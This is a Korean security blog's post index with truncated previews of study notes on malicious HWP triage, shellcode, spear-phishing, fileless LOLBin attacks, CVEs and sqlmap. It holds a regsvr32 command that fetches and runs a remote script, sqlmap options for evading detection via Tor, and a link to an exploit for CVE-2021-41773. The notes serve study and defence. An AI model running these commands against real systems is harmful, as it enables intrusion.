전체 글 썸네일형 리스트형 악성 HWP 문서 분석 HWP 트리아지 징후 OLE스트림을 포함하고 있고 실행 파일을 포함하고 있는 스트림이 존재하면 악성 가능성 높음 BinData 스토리지에 OLE 확장자를 가지고 있는 스트림이 존재하는지 확인 HWP 파일의 압축을 푼 후, 패턴매칭을 활용해 실행 파일을 포함하고 있는 스트림이 존재하는지 확인 포스트 스크립트를 포함하고 있는 스트림이 존재하면 악성일 가능성이 높음 PS 또는 EPS 확장자를 가지고 있는 스트림이 존재하는지 확인 스트림 내용을 확인하여 정상적인 포스트 스크립트인지 확인 동일한 내용의 스트림이 다수 존재하는 경우 악성일 가능성이 높음 동일한 사이즈의 스트림이 다수 존재하는지 확인 실행 파일을 포함하고 있는 스트림(PE파일)이 존재하는 경우 악성일 가능성이 높음 HWP 파일의 압축을 푼 후, 패턴.. 더보기 쉘코드 분석 쉘코드란 : 주로 sw 취약점을 공격하는 익스플로잇의 페이로드. msword.exe > loader로 시스템에 적재 > DLL 로딩(참조해야할 함수들 kernel32.dll, user32.dll) > 바인딩 > 스택버퍼, 청크에 메모리 확보 > 디코딩 쉘코드 관련 라이브러리 함수 파일 디코딩 - CreateFileA(), ReadFile() DLL로드 - LoadLibraryA() 네트워크 통신 - socket(), HTTPOpenRequest() 프로세스 - Process32First() 코드 인젝션 - VirtualAllocEx() yara룰로 API hash 분석 패턴매칭 > yara64 -r c: \Tools\Yar a_Rules\API_Hash\api _hash_ror13add.yara anal.. 더보기 스피어피싱 이메일 분석 스피어피싱 : 특정한 대상을 노린 피싱 공격 기법으로 링크나 악성 파일을 첨부한다.(HWP, DOC, PDF, RTF..) 악성 문서 파일의 일반적 구성 요소 Exploit : 문서 파일을 처리하는 sw의 임의 코드를 실행하여 비정상 동작을 유발하게 하는 공격 Shellcode(Payload) : 취약한 sw의 메모리에서 임의로 실행되는 코드. exploit을 통해 취약한 상태를 만들고 shellcode를 실행하여 악성행위를 수행 ex) x31/x43/x76... script/MACRO : 악성 문서에 의해 자동으로 실행되는 VB스크립트, 자바 스크립트 들 executable file : 일반적으로 악성 문서파일 내에 암호화된 형태로 내장 eml viewer MHA(Mail Header Analyzer).. 더보기 표적 공격 파일리스 공격 : 실행되는 코드가 파일로 생성되지 않고 메모리에만 존재하며(DLL, EXE) 흔적을 남기 지 않는 공격 --> 목표는 디스크를 쓰지 않고 공격하겠다. 특징 프로셋 인젝션 기술 사용 LoL(Living off the Land)바이너리들을 사용 마이터어택 프레임워크로 공격이 어려워지니 공격자들이 이미 운영체제에 있는 바이너리, 스크립트, 그리고 라이브러리 등을 이용해 공격한다. 이를 LOLBINS 공격이라함. [regsvr32.exe : DLL과 ActiveX를 등록하거나 등록해지하는데 사용되는 프로그램] regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll 다음과 같이 외부 호스트에서 .sct파일을 불러오고 내장된 script로 실행 /.. 더보기 KISA : 스피어피싱 기본 더보기 CVE 이해 CVE(Common Vulnerabilities and Exposures) : 공개적으로 알려진 컴퓨터 보안 결함 목록 [CVE-년도-번호] CVE는 (CVE넘버링 기관)CNA에서 할당한다. ex)Red Hat, IBM, Cisco, Oracle, MS 등 100개 정도 CVE에 해당하는 조건 독립적으로 수정 가능해야 - 다른 버그로부터 독립적 피해를 입은 벤더 또는 문서를 통해 확인가능한 경우 하나의 코드베이스에 영향을 미쳐야 함 익스플로잇 활용 [cve-2021-41773] : path traversal + RCE https://github.com/thehackersbrain/CVE-2021-41773 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021.. 더보기 자동화 도구 sqlmap : 자동화 sql 인젝션 및 db 탈취 도구 --delay=DELAY //서비스 부하를 줄이기 위해 delay 사용(방화벽 차단 방지) --risk=RISK //운영 서비스 안전을 위해 risk 단계 설정 가능 --tor, --tor-port=TORPORT, --tor-type=TORTYPE // 탐지 우회를 위해 tor 사용 -r REQUESTFILE // http request dump 캡쳐 편의를 위해 r 옵션 사용 가능 sqlmap 자동화 도구로 쿼리를 얻어낸 후에는 수동으로 쿼리를 변조하는 것이 안전 성공 시 python sqlmap.py -u "공격 도메인" --data "" get 방식은 u 옵션은 파라미터를 포함한 전체를 넣어야 함 python sqlmap.py -u "공격 도.. 더보기 owasp top 10 보호되어 있는 글입니다. 더보기 이전 1 2 3 4 5 6 7 8 ··· 38 다음
